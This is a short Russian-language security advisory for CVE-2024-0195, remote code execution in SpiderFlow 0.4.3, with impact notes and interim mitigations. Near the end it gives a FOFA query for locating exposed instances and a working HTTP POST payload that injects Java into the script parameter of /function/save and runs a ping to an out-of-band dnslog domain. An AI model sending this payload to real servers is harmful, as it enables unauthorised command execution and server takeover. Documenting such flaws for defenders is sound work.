
Эксплойт proof-of-concept для CVE-2024-0195, критической уязвимости внедрения кода в SpiderFlow 0.4.3, позволяющей удаленное выполнение кода через конечную точку FunctionService.saveFunction.
CVE-2024-0195 — это критическая уязвимость внедрения кода в веб-приложении spider-flow версии 0.4.3, конкретно в функции FunctionService.saveFunction файла FunctionController.java. Злоумышленник может удалённо внедрить вредоносный код, который выполняется на сервере. Это позволяет полностью скомпрометировать приложение.
Эта уязвимость чрезвычайно серьезна, так как позволяет удалённо выполнять код на сервере, где работает уязвимое приложение spider-flow. Злоумышленник может полностью скомпрометировать сервер, украсть конфиденциальные данные, установить вредоносное ПО или криптомайнеры и использовать его для дальнейших атак внутри сети. Конфиденциальность, целостность и доступность приложения и сервера критически нарушены.
Исправленная версия явно не указана, поэтому в настоящее время установка патча, похоже, недоступна. Уязвимость была публично раскрыта, и эксплойты доступны, поэтому немедленное смягчение последствий критически важно.
Пока официальный патч не выпущен, spider-flow 0.4.3 следует немедленно отключить или ограничить доступ только доверенным сетям/пользователям. Межсетевые экраны веб-приложений или другие средства контроля проверки входных данных можно настроить для обнаружения и блокировки попыток внедрения кода в качестве временной меры. Однако это не полные решения, и уязвимая версия должна быть обновлена, как только станет доступен исправленный релиз.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ Доказательство концепции
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B